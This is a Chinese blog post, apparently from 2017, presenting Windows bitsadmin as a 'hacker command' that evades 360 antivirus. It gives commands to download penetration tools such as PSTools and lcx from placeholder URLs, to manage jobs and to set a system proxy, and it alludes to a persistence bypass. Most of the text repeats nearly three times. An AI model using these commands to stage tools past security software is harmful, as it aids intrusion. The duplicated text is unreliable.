有趣的命令行系列——360安全卫士都拦不住的黑客命令bitsadmin

原创 海阳顶端

海阳顶端头条号，专注于黑客知识普及，提高大众网络安全意识。有趣的命令行系列，这是第十四篇。自Win7开始系统默认包含Bitsadmin，是一个命令行工具，可用于创建下载或上载作业并监视其进度。它也可通过powershell调用，名称为BITS cmdlets。但是这个命令，黑客们发现了它的一些强大功能，本文介绍一下。

一、Bitsadmin 下载文件命令示例

我在WIN10下，Bitsadmin版本为3.0，这个命令太复杂了，如果介绍完估计能写一本书，光是它的参数就够让你头疼的。

不过我们化繁为简，只提取几个我们能需要的命令。黑客渗透测试当中，最常干的事就是上传下载了。Bitsadmin下载文件有多种方法，你只需掌握一种就行，下边我给你列出四种下载方法：

1.bitsadmin /rawreturn /transfer getfile http://url/files/PSTools.zip c:p.zip

2.bitsadmin /rawreturn /transfer getpayload http://url/files/PSTools.zip c:p.zip

3.bitsadmin /transfer myDownLoadJob /download /priority normal "http://url/PSTools.zip" "c:p.zip"

第3条命令带进度条。

多条命令合起来下载

4.bitsadmin /create myDownloadJob

bitsadmin /addfile myDownloadJob http://url c:lcx.zip

bitsadmin /resume myDownloadJob

bitsadmin /info myDownloadJob /verbose

bitsadmin /complete myDownloadJob

我以第一种方法示例抓图：

二、Bitsadmin查看和取消下载任务

在第一步的第4条中，我们建立了myDownloadJob任务。如何查看本机的任务和取消任务呢？

列出所有任务：

bitsadmin /list /allusers /verbose#如果列所有用户需管理员权限

删除某个任务：

bitsadmin /cancel

上图中我只是个测试图，我并没有建立myDownloadJob任务。

三、设置全局HTTP（S）代理

微软给出的具体示例是：

bitsadmin /util /setieproxy localsystem AUTODETECT

bitsadmin /util /setieproxy localsystem MANUAL_PROXY proxy1,proxy2,proxy3 NULL

bitsadmin /util /setieproxy localsystem MANUAL_PROXY proxy1:80 ""

下图是在我的WIN10本机下执行的命令：

bitsadmin /util /setIEproxy localsystem MANUAL_PROXY 10.1.1.20:8080 "local"。

还有其它设置的命令如下，可以自己试一下。

bitsadmin /util /setIEproxy localsystem MANUAL_PROXY 10.1.1.20:8080 “”

bitsadmin /util /setIEproxy localservice MANUAL_PROXY 10.1.1.20:8080 “”

bitsadmin /util /setIEproxy networkservice MANUAL_PROXY 10.1.1.20:8080 “”

显示本机代理和取消本机代理的命令。

1.Bitsadmin /util /getIEproxy localservice

2.bitsadmin /util /setIEproxy localservice NO_PROXY

有趣的命令行系列——360安全卫士都拦不住的黑客命令bitsadmin

原创 海阳顶端 2017-12-14 07:31:05

海阳顶端头条号，专注于黑客知识普及，提高大众网络安全意识。有趣的命令行系列，这是第十四篇。自Win7开始系统默认包含Bitsadmin，是一个命令行工具，可用于创建下载或上载作业并监视其进度。它也可通过powershell调用，名称为BITS cmdlets。但是这个命令，黑客们发现了它的一些强大功能，本文介绍一下。

一、Bitsadmin 下载文件命令示例

我在WIN10下，Bitsadmin版本为3.0，这个命令太复杂了，如果介绍完估计能写一本书，光是它的参数就够让你头疼的。

不过我们化繁为简，只提取几个我们能需要的命令。黑客渗透测试当中，最常干的事就是上传下载了。Bitsadmin下载文件有多种方法，你只需掌握一种就行，下边我给你列出四种下载方法：

1.bitsadmin /rawreturn /transfer getfile http://url/files/PSTools.zip c:p.zip

2.bitsadmin /rawreturn /transfer getpayload http://url/files/PSTools.zip c:p.zip

3.bitsadmin /transfer myDownLoadJob /download /priority normal "http://url/PSTools.zip" "c:p.zip"

第3条命令带进度条。

多条命令合起来下载

4.bitsadmin /create myDownloadJob

bitsadmin /addfile myDownloadJob http://url c:lcx.zip

bitsadmin /resume myDownloadJob

bitsadmin /info myDownloadJob /verbose

bitsadmin /complete myDownloadJob

我以第一种方法示例抓图：

二、Bitsadmin查看和取消下载任务

在第一步的第4条中，我们建立了myDownloadJob任务。如何查看本机的任务和取消任务呢？

列出所有任务：

bitsadmin /list /allusers /verbose#如果列所有用户需管理员权限

删除某个任务：

bitsadmin /cancel

上图中我只是个测试图，我并没有建立myDownloadJob任务。

三、设置全局HTTP（S）代理

微软给出的具体示例是：

bitsadmin /util /setieproxy localsystem AUTODETECT

bitsadmin /util /setieproxy localsystem MANUAL_PROXY proxy1,proxy2,proxy3 NULL

bitsadmin /util /setieproxy localsystem MANUAL_PROXY proxy1:80 ""

下图是在我的WIN10本机下执行的命令：

bitsadmin /util /setIEproxy localsystem MANUAL_PROXY 10.1.1.20:8080 "local"。

还有其它设置的命令如下，可以自己试一下。

bitsadmin /util /setIEproxy localsystem MANUAL_PROXY 10.1.1.20:8080 “”

bitsadmin /util /setIEproxy localservice MANUAL_PROXY 10.1.1.20:8080 “”

bitsadmin /util /setIEproxy networkservice MANUAL_PROXY 10.1.1.20:8080 “”

显示本机代理和取消本机代理的命令。

1.Bitsadmin /util /getIEproxy localservice

2.bitsadmin /util /setIEproxy localservice NO_PROXY

有趣的命令行系列——360安全卫士都拦不住的黑客命令bitsadmin

原创 海阳顶端 2017-12-14 07:31:05

海阳顶端头条号，专注于黑客知识普及，提高大众网络安全意识。有趣的命令行系列，这是第十四篇。自Win7开始系统默认包含Bitsadmin，是一个命令行工具，可用于创建下载或上载作业并监视其进度。它也可通过powershell调用，名称为BITS cmdlets。但是这个命令，黑客们发现了它的一些强大功能，本文介绍一下。

一、Bitsadmin 下载文件命令示例

我在WIN10下，Bitsadmin版本为3.0，这个命令太复杂了，如果介绍完估计能写一本书，光是它的参数就够让你头疼的。

不过我们化繁为简，只提取几个我们能需要的命令。黑客渗透测试当中，最常干的事就是上传下载了。Bitsadmin下载文件有多种方法，你只需掌握一种就行，下边我给你列出四种下载方法：

1.bitsadmin /rawreturn /transfer getfile http://url/files/PSTools.zip c:p.zip

2.bitsadmin /rawreturn /transfer getpayload http://url/files/PSTools.zip c:p.zip

3.bitsadmin /transfer myDownLoadJob /download /priority normal "http://url/PSTools.zip" "c:p.zip"

第3条命令带进度条。

多条命令合起来下载

4.bitsadmin /create myDownloadJob

bitsadmin /addfile myDownloadJob http://url c:lcx.zip

bitsadmin /resume myDownloadJob

bitsadmin /info myDownloadJob /verbose

bitsadmin /complete myDownloadJob

我以第一种方法示例抓图：

二、Bitsadmin查看和取消下载任务

在第一步的第4条中，我们建立了myDownloadJob任务。如何查看本机的任务和取消任务呢？

列出所有任务：

bitsadmin /list /allusers /verbose#如果列所有用户需管理员权限

删除某个任务：

bitsadmin /cancel

上图中我只是个测试图，我并没有建立myDownloadJob任务。

三、设置全局HTTP（S）代理

微软给出的具体示例是：

bitsadmin /util /setieproxy localsystem AUTODETECT

bitsadmin /util /setieproxy localsystem MANUAL_PROXY proxy1,proxy2,proxy3 NULL

bitsadmin /util /setieproxy localsystem MANUAL_PROXY proxy1:80 ""

下图是在我的WIN10本机下执行的命令：

bitsadmin /util /setIEproxy localsystem MANUAL_PROXY 10.1.1.20:8080 "local"。

还有其它设置的命令如下，可以自己试一下。

bitsadmin /util /setIEproxy localsystem MANUAL_PROXY 10.1.1.20:8080 “”

bitsadmin /util /setIEproxy localservice MANUAL_PROXY 10.1.1.20:8080 “”

bitsadmin /util /setIEproxy networkservice MANUAL_PROXY 10.1.1.20:8080 “”

显示本机代理和取消本机代理的命令。

1.Bitsadmin /util /getIEproxy localservice

2.bitsadmin /util /setIEproxy localservice NO_PROXY

三、Bitsadmin过360主防加启动项

这个功能我以前用了好久，不过后来被黑客3gstudent公布了，所以本文我也就不写了。具体细节你可以百度搜索《Use bitsadmin to maintain persistence and bypass Autoruns》这篇文章。这个方法一公布出来就被封了，再是用这种方法有个90天的限制的。

图文来自网络 侵删